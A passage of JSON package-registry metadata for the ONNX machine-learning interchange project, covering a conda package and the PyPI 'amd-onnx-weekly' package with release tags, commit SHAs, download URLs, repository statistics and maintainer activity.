/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2026-03-03T16:04:51.623Z","dependent_packages_count":5,"downloads":10340,"downloads_period":"total","dependent_repos_count":8,"rankings":{"downloads":null,"dependent_repos_count":39.21327596803933,"dependent_packages_count":5.101413644744929,"stargazers_count":6.2692071296865395,"forks_count":5.5623847572218805,"docker_downloads_count":null,"average":14.036570374923171},"purl":"pkg:conda/onnx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/onnx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-03T08:00:27.210Z","issues_count":1003,"pull_requests_count":2109,"avg_time_to_close_issue":24651025.396024466,"avg_time_to_close_pull_request":3735694.253348214,"issues_closed_count":653,"pull_requests_closed_count":1792,"pull_request_authors_count":181,"issue_authors_count":606,"avg_comments_per_issue":2.6739780658025922,"avg_comments_per_pull_request":1.9829302987197723,"merged_pull_requests_count":1455,"bot_issues_count":5,"bot_pull_requests_count":388,"past_year_issues_count":117,"past_year_pull_requests_count":732,"past_year_avg_time_to_close_issue":642776.1395348837,"past_year_avg_time_to_close_pull_request":325791.33208955225,"past_year_issues_closed_count":43,"past_year_pull_requests_closed_count":536,"past_year_pull_request_authors_count":55,"past_year_issue_authors_count":65,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":1.5983606557377048,"past_year_bot_issues_count":4,"past_year_bot_pull_requests_count":98,"past_year_merged_pull_requests_count":455,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":439,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"jcwchen","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"take-cheeze","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"daquexian","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"zhenhuaw-me","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"prasanthpul","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"houseroad","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"lutzroeder","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"linkerzhang","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"},{"login":"KifoPL","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KifoPL"}],"active_maintainers":[{"login":"andife","count":243,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"take-cheeze","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/onnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/onnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/onnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/onnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/onnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/onnx/codemeta","maintainers":[],"registry":{"name":"anaconda.org","url":"https://anaconda.org","ecosystem":"conda","default":true,"packages_count":5213,"maintainers_count":0,"namespaces_count":0,"keywords_count":3232,"github":"Anaconda","metadata":{"kind":"anaconda","key":"Main","api":"https://repo.ananconda.com","funded_packages_count":759},"icon_url":"https://github.com/Anaconda.png","created_at":"2022-10-03T15:37:08.736Z","updated_at":"2026-06-10T05:18:41.108Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/namespaces"}},{"id":10695694,"name":"amd-onnx-weekly","ecosystem":"pypi","description":"Open Neural Network Exchange","homepage":"https://onnx.ai/","licenses":"Apache License v2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":70,"first_release_published_at":"2024-07-16T01:28:01.000Z","latest_release_published_at":"2025-01-27T00:19:02.000Z","latest_release_number":"1.18.0.dev20250127","last_synced_at":"2026-06-04T19:33:42.236Z","created_at":"2024-07-16T01:30:53.038Z","updated_at":"2026-06-04T19:33:42.237Z","registry_url":"https://pypi.org/project/amd-onnx-weekly/","install_command":"pip install amd-onnx-weekly --index-url https://pypi.org/simple","documentation_url":"https://amd-onnx-weekly.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Programming Language :: Python :: 3"],"normalized_name":"amd-onnx-weekly","project_status":null},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2024-10-29T19:59:31.000Z","size":35154,"stargazers_count":17846,"open_issues_count":353,"forks_count":3670,"subscribers_count":437,"default_branch":"main","last_synced_at":"2024-10-29T20:10:31.600Z","etag":null,"topics":["deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","mxnet","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2024-10-29T17:45:37.000Z","dependencies_parsed_at":"2024-06-01T21:40:18.027Z","dependency_job_id":null,"html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2553,"total_committers":336,"mean_commits":7.598214285714286,"dds":0.8950254602428516,"last_synced_commit":"8a6b70f0adcff5409b8cd65883bbbea7d6c4f4e1"},"previous_names":[],"tags_count":30,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121765,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.e